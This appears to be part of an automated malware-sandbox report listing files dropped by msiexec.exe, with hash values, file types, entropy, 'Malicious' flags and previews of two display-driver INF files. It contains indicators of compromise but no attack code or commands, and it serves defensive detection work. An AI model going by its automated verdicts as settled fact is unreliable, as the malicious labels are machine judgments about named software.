                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:nbZYULZ73iO/kwji3FWx+FJ4gwgDNSV2U5ANaudsJvdjsCIrqhZxu3hUlZNO:nHL53D/djPxaJ4gGQU5ANaudsjg9+hZk
                                                                                                                                                                                                                                                                                                                                  MD5:21E18A96C9A2E6F0838DA7BBD272CE21
                                                                                                                                                                                                                                                                                                                                  SHA1:C940F5069CE95083865D2D985682D51296B81257
                                                                                                                                                                                                                                                                                                                                  SHA-256:6CA7A9B8F2600181A4D47FA7090FF37E412687E7EA64BA5CAC4319277BE60C74
                                                                                                                                                                                                                                                                                                                                  SHA-512:1819469664C0DDE5ADFDA140313C32F9874301E103FF74E95AC684BAB71D06668299B8092564993727DF380E276B2400C1E1025D9527F637826BFCDFC9D78E66
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.629648031240336
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:uMuUBfWPmqKebW1j2zAAHOOntqVuvTRKzOqUAY8JN77hhecs:JHqKyWMvUutVjO3hob
                                                                                                                                                                                                                                                                                                                                  MD5:955C309947C5CAEFFB429DBF12DC13A1
                                                                                                                                                                                                                                                                                                                                  SHA1:5079A801E91F9ACBE996FBCAE6D402B7E5FC72D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:59BBC2EBBA9CD056FBA8B80FC0E5DA9540D6E50F419216A1BB2A4B3E95AFB480
                                                                                                                                                                                                                                                                                                                                  SHA-512:BD4BBE228378466AD50F2B734438DDBD4FE8F6C7C3B573080834321C99E748512BE8511A927D4FD8B00635D320BEF7B245E05F174988F283B4339E1F8CED1BCE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10660
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.072232435699263
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:2vBYcjEdZubhLtaSu9sZscF8Bd1LUEduasnZH5:B0+ZKoqZsHLUHPnh5
                                                                                                                                                                                                                                                                                                                                  MD5:CCC20AC60F19430FBFDA6D49F164654C
                                                                                                                                                                                                                                                                                                                                  SHA1:425253D81B930175321A9B54AB4B6D736D6AF8A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:D96B2FBFDD9245EA1D46994183917340912FE9A07AC569B4F70AD51123E55EDB
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9B9AB9DCF0286F2A5635DD8BE1DF5F7718017EC580B46A217EC4B77615F7D7F0FEF4484886884A912172BF8F6C16252AD5E982205AACAB73152F65A67951475
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4514
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7907010583152645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:9G2XNDctEXHQ+C2C4kqWDZXpbdl5Vjnijla4UAiI6fOgTiYqG585wg3Jp:9XcWEDNRniWI6fyw5I
                                                                                                                                                                                                                                                                                                                                  MD5:9CF8CFC1E0815F7D72D136DE87B08EEA
                                                                                                                                                                                                                                                                                                                                  SHA1:F2EEEC23EC55758E5072619B62E6851234FA6D3C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CA9C7A430D0B608F1A6ADDD9E2C17BF79845783356CE6230ECA1942A061B157
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D3FEE674C83B1E68CAE7F079F74A70931D432751420300DB77DB2B237A88D81AC3CD8B4B82532DCDDEE5D1DBEF3077ACD97B5890DFA0A497B97D7594E3C15F9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..;.....;.M.o.d.u.l.e. .N.a.m.e.:.....;. . . . .l.c.i._.i.d.d.c.x...i.n.f.....;.....;.A.b.s.t.r.a.c.t.:.....;. . . . .I.N.F. .f.i.l.e. .f.o.r. .i.n.s.t.a.l.l.i.n.g. .t.h.e. .L.C.I. .I.D.D.C.X. .D.r.i.v.e.r.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.L.C.I.%.....C.a.t.a.l.o.g.F.i.l.e.=.l.c.i._.i.d.d.c.x...c.a.t.....D.r.i.v.e.r.V.e.r.=.1.0./.2.3./.2.0.1.7.,.1...0...2.0.1.7...1.0.2.3.........[.D.e.s.t.i.n.a.t.i.o.n.D.i.r.s.].....D.e.f.a.u.l.t.D.e.s.t.D.i.r. .=. .1.2.....U.M.D.r.i.v.e.r.C.o.p.y.=.1.2.,.U.M.D.F. .;. .c.o.p.y. .t.o. .d.r.i.v.e.r.s.\.u.m.d.f.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...x.8.6.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...a.m.d.6.4.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11975
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.929505838705397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:qRVW/ujEdZubhLtaSu9sZscF8Bd1LUY6uasnZHou49L:k+ZKoqZsHLUcPnhou4t
                                                                                                                                                                                                                                                                                                                                  MD5:186504237027590F25BEA0EC539256C8
                                                                                                                                                                                                                                                                                                                                  SHA1:A74309D7CFA8EF410EC85D3801D27291E8BC915A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4CBD88D04F9C3B3DE3625B25049EA6B7C1614FFEA8730667BFF01DD210415ED1
                                                                                                                                                                                                                                                                                                                                  SHA-512:9D4B89A95DBF8D0ABFC55AE44C9CBFB29EB64AB1FFFBB81FFAB4308ED4CFD040F9A883B2B7B7A375B1675DD08532378C38410F4DB737FBDA2913EB28DE18A933
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2715
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.418922446200014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:qnch1OKbzLbS10bzPbSvb/mwwophwwoJOxWqrz61/zA9cjiJIjgW5FH1519HS4Bc:Pcua1YuSnEhn/A7ic4d4y
                                                                                                                                                                                                                                                                                                                                  MD5:07DC873615C74141FB8A646F6FE1D378
                                                                                                                                                                                                                                                                                                                                  SHA1:7E2D32A5ACE72B7F3919215B707096B52CC3B5EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:F97F4A79BF9ACB0D7FFB257CB3E16687F6281B8687C79361B680764F3427EF61
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D59EBD58BFCDBD0115C22148DDFB1DE73E3D0C2AA42B2772B75F12D76BFA4FC3E8356346F0BE9B8F5631443FBCCCFD63354235E701A966CE104BDDC9A4987AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..;..;Module Name:..;..; lci_proxywddm.inf..;..;Abstract:..; LuminonCore Display Proxy Driver..;..;..[Version]..Signature="$WINDOWS NT$"..Class=System..ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}..Provider=%LCI%..DriverVer=10/23/2017,1.0.2017.1023..CatalogFile=lci_proxywddm.cat....[DestinationDirs]..DefaultDestDir = 12..lci_proxywddm.CopyFiles = 12 ; drivers..lci_proxyumd.CopyFiles = 11 ; system32..lci_proxyumdwow.CopyFiles = 10, SysWow64 ; x64-specific....[SourceDisksNames.x86]..1=%DiskId1%, lci_proxywddm.sys,,\x86..1=%DiskId1%, lci_proxyumd.dll,,\x86....[SourceDisksNames.amd64]..1=%DiskId1%, lci_proxywddm.sys,,\x64..1=%DiskId1%, lci_proxyumd.dll,,\x64..1=%DiskId1%, lci_proxyumd32.dll,,\x64....[SourceDisksFiles.x86]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1....[SourceDisksFiles.amd64]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1..lci_proxyumd32.dll = 1......;*****************************************
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):46528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.272518240848504
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ql+LPDB5MAHFg6IWSG1ucVPajIyouwc09euwjsV3xnxhc:ql+Lt5X4WSM1a8youwzOsVxA
                                                                                                                                                                                                                                                                                                                                  MD5:F018A1846A12B5DFF4A5FB0343745BBA
                                                                                                                                                                                                                                                                                                                                  SHA1:C8E871A51E43B5E71A4D1ACA0A791B375CABAC86
                                                                                                                                                                                                                                                                                                                                  SHA-256:3E5D8C95805CAECFC1BF5F689F036D1831E375E573F2B0BFFA4BBB59EA36B853
                                                                                                                                                                                                                                                                                                                                  SHA-512:7DECEBD14950548436EB110F93A5951ABE42B6CACF8A041F77DFCE923FFB28B6B399EC3166F0D64A1B098F9671F73E43D020977D7EC093F7B786038C4A05C3B8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):176576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.124833448410162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:WSNRRE5R1pHa9i/hXYTqHDh3ikNrgfxhxe74bgGY53Urb7:WS67jsKCT2d1NsDgGY5387
                                                                                                                                                                                                                                                                                                                                  MD5:37CF508FA1EB389ED85F822BAF9EF9B9
                                                                                                                                                                                                                                                                                                                                  SHA1:1720BEFADBD467FD715CE301545BC1FF02DB4681
                                                                                                                                                                                                                                                                                                                                  SHA-256:FA4CAC0B0361D85CE6220809FA85DFE3B295A187A7B58DD5FE5B06A7CE19F7FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:B90CD035F83245EEDC1FC09ADEDFAC341411CFC47D130B891B2CC83B908F9F683DFFB140AA61F11B7BD15C8A5725070A92659CC567FA58F5879A1790B56833F5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5166932980708925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Si+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIo3:h+xNDVCYFB/vqIo3
                                                                                                                                                                                                                                                                                                                                  MD5:A9D5E6605391A4CE7E3699D5C39BA851
                                                                                                                                                                                                                                                                                                                                  SHA1:54950896563D61917A4A61949E8B3552BC85A061
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA06D1A20DDDBF33AA776DE2036651F5B2A2AFF9503A2D7174C11000F92D0396
                                                                                                                                                                                                                                                                                                                                  SHA-512:91FB4793621E8FDE6E62074F8545C4AFB636DBFAF3C236E803325DEE7B2CB33F5F1B183D565D11195912CF6DC2BBDA8F472D844AD8AF5C7738EFCB702D71BB59
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):115136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.395746141588922
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:7d+TsLFRVW08y8ka9xh+V3Un7C8PcYNzAR2k:R+wpCh+Vk7LPcWE0k
                                                                                                                                                                                                                                                                                                                                  MD5:91F0E25E7EDF20F4B262A5419CDF73F2
                                                                                                                                                                                                                                                                                                                                  SHA1:3D09164F4298A0EB1EEC978C1D3CA8259AABA326
                                                                                                                                                                                                                                                                                                                                  SHA-256:D9EF2E7A55DE74FFB18CFD2CD875089B81416B636CB6BD73A6DAFDDD5E3E0BF4
                                                                                                                                                                                                                                                                                                                                  SHA-512:2F4076F08EA9F3960A374F872AA547581811B4D1D225978F4FDFB5E42EF6FE79C491A53B33F7DD1E2B71BE6A281EFE29E7BF8ECFFD660D101F456AC4D456FA75
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.407648101166343
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:FkVsC2/s2Abnkr+YcSIVO67k5hVEi4ZKoqZsHLErHPnhk:nP0bE+YHIO67kLcn2/hk
                                                                                                                                                                                                                                                                                                                                  MD5:1FB5DE2628ECB1E835B18FDA9EB0CF29
                                                                                                                                                                                                                                                                                                                                  SHA1:560AD3A8FC97187403754FBE2F3DBA056948B6CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:D1ADED22243AAF4B8727B064073B9CB1C33214DA01E76D08E69996E52E774538
                                                                                                                                                                                                                                                                                                                                  SHA-512:E51BD203950E4D5DF2E26E59D90D8DC7E0B2D767C58688D2CBAB0BFD5ED5C884A72E029A737FCF1E04C908D7404645EDEC609A2E7C42E6BDCA1CDD04AB2169CC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.573292469340805
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:jbWmecDs6zvVt94VbJqvhkqskgSjyzFigs2Ktmen4hI:jbM6JX0Jq5kNGcsntmer
                                                                                                                                                                                                                                                                                                                                  MD5:33C12C6F8271195C79B755388642FF77
                                                                                                                                                                                                                                                                                                                                  SHA1:ABF3438FC7FF738BF3D030AE68BB16CBF4848462
                                                                                                                                                                                                                                                                                                                                  SHA-256:086E922B53D801F63043D067A185893E5CD6341394B0E8C253D08D85D14B60A5
                                                                                                                                                                                                                                                                                                                                  SHA-512:13B8EEDF0E98476E40DAB4059C6E91C591FA1DD21844151916CA70E1440FE22FA211D53E766D37DF0E494739C7881AF340731FCCAFAE73CAF81733D9FC1E1E88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.516896540085767
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:/i+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIo8:K+xNDVCYFB/vqIo8
                                                                                                                                                                                                                                                                                                                                  MD5:F67D8A541D407C6886D6358248014B8E
                                                                                                                                                                                                                                                                                                                                  SHA1:9E17CD44ABBE3B30E0B52FBC5A6012BEA2CFCE61
                                                                                                                                                                                                                                                                                                                                  SHA-256:919ACBEDDCBFE27D12EE44ECD38044D880A68622D7BC412FF81B089746C79E5F
                                                                                                                                                                                                                                                                                                                                  SHA-512:674D9427B3F62382AD56EA647FD131CFF2E78CF31D5E7F608191390E752C382946C4CADB26B556F670C8C4A1C9245D1857841527C755BC505295224C4256C495
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.517207826538128
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Bi+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIod:s+xNDVCYFB/vqIod
                                                                                                                                                                                                                                                                                                                                  MD5:66541304390931345318FA3802797820
                                                                                                                                                                                                                                                                                                                                  SHA1:11B3116900D0BB1D9F49E39788C4C21A6B82954E
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9CB315AD55CAD2147AAEBDCCC02055868DAF3EFD9F25384E50E80CE81EC018E
                                                                                                                                                                                                                                                                                                                                  SHA-512:852EF5A95F5827E8BCBC437371FFE6B3959AD41F319721E14804BD143E1597753F0DE4DA86864098F11B4F0698831529054D07B3650AECE83DAB2E5A7C51AE2A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):88000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.656236620722421
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:1++m+LZZ3SFkKjrZFWUwTK4gCQ7fBr8UQ6SIDXvjeIg6NhUA0d:1LL73SFHjOUaK4gNoUQ6SE7hXNhUA0d
                                                                                                                                                                                                                                                                                                                                  MD5:B36B39A2AA5C15D0167A7D8454AE71A6
                                                                                                                                                                                                                                                                                                                                  SHA1:2CD2E7DAF1762A44F4FD4FC84FFC60D84A2AEFA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:01871A132386F81DFD4894E9DAEB9433C4BE2A99EBE8FEC954E5182A43E96AF0
                                                                                                                                                                                                                                                                                                                                  SHA-512:4BC14EDF6C0A9695764DEAD9C90F502DCDB7F420BD54794539183BFFECD054218290C23C57155EF982F1DAA4B479DAF80B63C7CA643F73AF2A66AC01E96926E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22976
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.652405722283548
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:pMuUkfWPmqKebW1j2zAAHOOntqVOviZKoqZsHLEF0PnhjIS:VHqKyWMvUOyncIhjIS
                                                                                                                                                                                                                                                                                                                                  MD5:893828FDA5B4026B36C238CBED43BCC2
                                                                                                                                                                                                                                                                                                                                  SHA1:B485E255B2F6F1C294BC127AA2BE14A39C346F56
                                                                                                                                                                                                                                                                                                                                  SHA-256:CEA46DCCAF211E71DE3895C08E7C9A828C53232EDDBC90C0A6E3552826A8DDFA
                                                                                                                                                                                                                                                                                                                                  SHA-512:951598591F2A395F8C5F993A5BD850CED11F43433DF00CF5B12CBAB360949E305A52CDF55A675C8FE59F275432C92D479444C91F71AB39AB342200560972A6A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):8367
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.279860186543382
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:+2A2RJoIo6vyowJL/aoxhHoe068jSJUbueqw4G:JRaD8YJLFHJ06dUb+w1
                                                                                                                                                                                                                                                                                                                                  MD5:092FF1A83123D816B748F0D382792543
                                                                                                                                                                                                                                                                                                                                  SHA1:C1D1E85955113B8AAB604107738E6B532FE5C706
                                                                                                                                                                                                                                                                                                                                  SHA-256:E81535236E4BDC5534677D05AB3DB67F03283E756233924945CC7D93D394DB5A
                                                                                                                                                                                                                                                                                                                                  SHA-512:7A24AF6CEF474663E615F9BCD5780D97D4249AE8D767EB60927A2BF7B7E66B1777486886C7A053C30301F98E22CCD5AAB7877BC47FA5000C34A707806B198864
                                                                                                                                                                                                                                                                                                                                  Malicious:false
